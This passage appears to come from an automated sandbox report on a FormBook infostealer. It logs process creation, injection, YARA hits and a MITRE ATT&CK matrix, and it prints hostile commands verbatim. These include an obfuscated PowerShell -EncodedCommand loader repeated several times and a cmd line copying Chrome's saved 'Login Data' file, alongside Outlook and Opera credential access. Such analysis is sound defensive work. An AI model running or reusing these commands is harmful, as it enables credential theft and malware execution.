      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread register set: target process: 4848Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 4848Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYw
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYwJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYwJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdlineJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6A9.tmp" "c:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP"Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: explorer.exe, 00000008.00000000.25611283871.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25046333050.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25219083815.00000000014C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000008.00000000.25626384425.000000000543A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25611283871.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.24913169633.0000000004B20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000008.00000000.25611283871.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25046333050.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25212115803.0000000000D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000008.00000000.25611283871.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25046333050.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25219083815.00000000014C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0819ECB0 CreateNamedPipeW,3_2_0819ECB0

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts121
      Scripting      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		1
      OS Credential Dumping      		2
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium3
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules      		1
      Registry Run Keys / Startup Folder      		713
      Process Injection      		121
      Scripting      		1
      Credential API Hooking      		14
      System Information Discovery      		Remote Desktop Protocol1
      Data from Local System      		Exfiltration Over Bluetooth11
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts11
      Command and Scripting Interpreter      		Logon Script (Windows)1
      Registry Run Keys / Startup Folder      		3
      Obfuscated Files or Information      		Security Account Manager121
      Security Software Discovery      		SMB/Windows Admin Shares1
      Email Collection      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts2
      PowerShell      		Logon Script (Mac)Logon Script (Mac)1
      DLL Side-Loading      		NTDS12
